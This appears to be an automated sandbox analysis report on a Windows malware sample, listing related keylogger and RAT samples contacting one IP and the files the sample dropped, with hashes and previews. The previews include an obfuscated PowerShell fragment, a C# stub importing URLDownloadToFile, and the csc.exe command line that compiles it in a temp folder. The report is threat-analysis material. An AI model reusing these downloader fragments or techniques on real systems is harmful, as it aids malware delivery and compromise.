                                                                                                    3b5074b1b5d032e5620f69f9f700ff0e173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 193.30.119.205
                                                                                                    173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 193.30.119.205
                                                                                                    sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 193.30.119.205
                                                                                                    thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 193.30.119.205
                                                                                                    PO_0001.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                    • 193.30.119.205
                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                    • 193.30.119.205
                                                                                                    No context
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (379), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):142402
                                                                                                    Entropy (8bit):3.673048157790213
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:WBRuDf5u0Ds5vu2T2bdRswCrngt5pQGwm:Wuzw6oWjRl
                                                                                                    MD5:004A6B908611F69C6E5CEA3D45229D1B
                                                                                                    SHA1:05BF5A3A2DA9158704991994F8B6540695A2A92A
                                                                                                    SHA-256:53E2C7B749014F21D8035E6EE15B9FB74B7749562120A46020205E41E2D73089
                                                                                                    SHA-512:0C5B7B0F474E1E9D5FA125368C7A43FD2DEB865B5A76860B1263D915B966C256BA2D3AE2453197B13B1A3E4F64FEDCAA3BA2950B950A28183CC8F29572903D27
                                                                                                    Malicious:false
                                                                                                    Preview:..........d.i.L.R.O.C.o.W.m.p.z.p.d.b.R. .=. .".N.p.G.L.W.j.k.W.U.S.U.A.W.R.L.".....P.P.U.x.U.i.f.e.j.a.L.t.h.k.C. .=. .".W.t.L.L.N.N.R.K.h.W.i.W.k.m.Z.".....Z.t.b.v.p.W.q.U.j.c.L.L.b.e.W. .=. .".i.g.G.k.K.W.W.N.U.A.j.S.i.Z.c.".....U.k.L.I.L.k.Q.O.N.K.W.B.e.G.o. .=. .".I.l.q.i.H.x.G.o.N.l.n.L.z.p.L.".....a.B.N.b.i.L.W.i.I.k.a.W.W.J.o. .=. .".W.G.W.c.e.r.c.a.d.e.i.r.a.k.e.o.l.f.i.l.k.W.c.".....n.W.x.x.z.Q.i.G.W.Z.v.i.r.d.K. .=. .".G.l.d.L.p.O.m.L.K.W.x.K.K.W.G.".........W.K.i.v.J.G.W.u.G.i.z.s.u.S.W. .=. .".t.c.c.G.K.n.G.L.e.c.e.r.c.a.d.e.i.r.a.N.I.f.u.".....c.s.B.c.c.p.f.G.G.i.P.P.K.j.L. .=. .".O.W.K.N.K.i.k.K.Q.W.W.h.K.Z.z.".....o.I.A.l.h.a.A.N.B.W.z.L.L.o.t. .=. .".u.m.q.R.b.i.W.P.O.t.f.f.i.U.Z.".........p.b.U.N.r.r.e.C.b.P.L.i.z.u.g. .=. .".z.L.e.m.K.W.i.W.c.u.c.k.W.L.L.".....L.W.n.B.q.L.P.c.Z.R.f.i.p.g.i. .=. .".P.K.R.U.f.m.L.B.o.i.z.G.L.O.a.".....L.L.U.G.K.i.i.L.l.G.P.A.N.W.d. .=. .".K.l.U.o.r.W.N.r.k.m.L.C.o.p.m.".....g.W.R.u.o.c.P.o.N.K.b.i.O.k.Z. .=. .".h.L.L.L.Z.k.h.e.A.H.B.S.
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5829
                                                                                                    Entropy (8bit):4.901113710259376
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Windows\SysWOW64\cleanmgr.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196608
                                                                                                    Entropy (8bit):1.1221538113908904
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                    MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                    SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                    SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                    SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Nov 26 10:44:29 2024, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1328
                                                                                                    Entropy (8bit):3.977883885120033
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Hpe9EujwZYzsBwZHUYwKLmfwI+ycuZhN0YakSnNPNnqSqd:gjwZUsBwZ0KLmo1ul7a3XqSK
                                                                                                    MD5:BE95AB6FA4E173DF35B93EECBDA74480
                                                                                                    SHA1:3658223378B821E614725ABBEEE542BDE3E80AB7
                                                                                                    SHA-256:C3D374467EC7FF063E7C4C80E610D77F4F5060840C0BFE7B8FC8F409BC0BB7B6
                                                                                                    SHA-512:7A77FAC650615928E5232C9E1E5490A32EC4C9E07A90AB993B832048A28AF60D9F03F5CBACD608D21BB09982D7B16CA7F415F68AE732F74164A59E53480F7B93
                                                                                                    Malicious:false
                                                                                                    Preview:L.....Eg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\uzumsuzj\CSC9B0A3672FBDD48D4844B884E3D96D699.TMP................a@.V..;T...4..............3.......C:\Users\user\AppData\Local\Temp\RESA57E.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.z.u.m.s.u.z.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):652
                                                                                                    Entropy (8bit):3.1062708403695116
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySYak7YnqqnNPN5Dlq5J:+RI+ycuZhN0YakSnNPNnqX
                                                                                                    MD5:6140C5561EC43B548CF40B34A108E9DD
                                                                                                    SHA1:60C905F4254FA9ED06124CD4C6B1F0F4A56D041F
                                                                                                    SHA-256:922C82A998D0129BCDD2924C74FF88CDC74EF00C0C40381EE2FB15A1C320DCF2
                                                                                                    SHA-512:DADD539BC5FE94709FF72C106B4936205A741D5C3137DA5DD4D985E001EB15046ED92F0662F26A9D10B5882924BD2C4EA47A97CDD58BB2545917448C6A42C159
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.z.u.m.s.u.z.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.z.u.m.s.u.z.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (367)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):480
                                                                                                    Entropy (8bit):3.7460947197404204
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:V/DsYLDS81zuYlIZMuBJhQXReKJ8SRHy4HrvuEJmq3oVPQy:V/DTLDfuluXfHpYCy
                                                                                                    MD5:E7B477366B9C1EC3E876C24B12933CA5
                                                                                                    SHA1:6E6FD343F5C1991CAD2C956AC78E9879367749DC
                                                                                                    SHA-256:7750DDC10FE1232628440971956EBB3D7A33DD57183B5B23980FC648E59D5A14
                                                                                                    SHA-512:C09AC0374DF8AF9BE5A932753758792F7673D68F9AF8C00AFE483DEC81EE0F92F18950FDDB2201F0B5E82726F1B503B558F8B8581FE6EF824D28B639A421A309
                                                                                                    Malicious:false
                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace oZV.{. public class gnKwWC. {. [DllImport("uRlMon.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dKbMnOiF,string j,string yfEjHooLu,uint FysSQTq,IntPtr AgN);.. }..}.
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):367
                                                                                                    Entropy (8bit):5.197371776676439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2qLTwi23fXz+zxs7+AEszIqLTwi23fXRyA:p37Lvkmb6KbwZPz+WZEmwZPRyA
                                                                                                    MD5:A083B51DEE2E3E81AEA1B100CBCBD54C
                                                                                                    SHA1:92B9E184C0B474DB3DFA6BA547BFDBD437C0E89C
                                                                                                    SHA-256:C95FEC98C5DC0A03C353A95C76CACA5A0F67745E7B68AFC2D3D7AC4B05E3E6A8
                                                                                                    SHA-512:C14DB6918F0C7BEB89A4A3255DECDF14EABB282EEC8DB156B517474A11E39542999749C47C9EA2AE037CA9AA6649AA8233C53A585359B566B15065C6FDEB3D5F
                                                                                                    Malicious:true
                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.0.cs"
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3072
                                                                                                    Entropy (8bit):2.8147663422648574
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:etGSwmPBG5eM7p8y7ZuktCa0z0sZNtkZfP5usoqhkWI+ycuZhN0YakSnNPNnq:6wsM+g5Cz0seJP5yEH1ul7a3Xq
                                                                                                    MD5:B42AC3ED7AFE729438A17B55858A31D7
                                                                                                    SHA1:7B9CEEAF2F2254E755E2CC90A99B89F55A7F055A
                                                                                                    SHA-256:876844C5A2368A2CA4D0C6AAAC13767EF39532AE2FEA145E9EC318537ADB242B
                                                                                                    SHA-512:A0CCD1176A00AB3C8D6FAE0F76C1BC75A18575A603C8C12FE4E9C5A1BACDEA3BBC73802B960EA414489541361697605ADA87F250AD4464EB0F9CA81E0B226CD8
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....r.....r.......................................... 9.....P ......K.........Q.....Z.....\.....f.....n...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.uz
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):864
                                                                                                    Entropy (8bit):5.312448286195974
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:K8qd3ka6KbwZPbEmwZPR4Kax5DqBVKVrdFAMBJTH:Hika6CwZPbEmwZPGK2DcVKdBJj
                                                                                                    MD5:2EE34B2CB41BCCCE509B655E8E6EF789
                                                                                                    SHA1:7C0A0B341A6203500A8B1E1E186C8459A453A357
                                                                                                    SHA-256:4ED79F4760FB99BC6BEEA19BC73AF0523F3A71BE5E5236CC82C50613B1D0CAAE
                                                                                                    SHA-512:E812117886647FB9FA41BF7EA64587AB40F8D7E2C8852BE64AA8F910556035DC0C169C21AA63FD5B74D89BDC0FFE8443E6B7FD34D106958E808BF24FBBD44DB5
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (379), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):142402
                                                                                                    Entropy (8bit):3.673048157790213
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:WBRuDf5u0Ds5vu2T2bdRswCrngt5pQGwm:Wuzw6oWjRl
                                                                                                    MD5:004A6B908611F69C6E5CEA3D45229D1B
                                                                                                    SHA1:05BF5A3A2DA9158704991994F8B6540695A2A92A
                                                                                                    SHA-256:53E2C7B749014F21D8035E6EE15B9FB74B7749562120A46020205E41E2D73089
                                                                                                    SHA-512:0C5B7B0F474E1E9D5FA125368C7A43FD2DEB865B5A76860B1263D915B966C256BA2D3AE2453197B13B1A3E4F64FEDCAA3BA2950B950A28183CC8F29572903D27
                                                                                                    Malicious:true
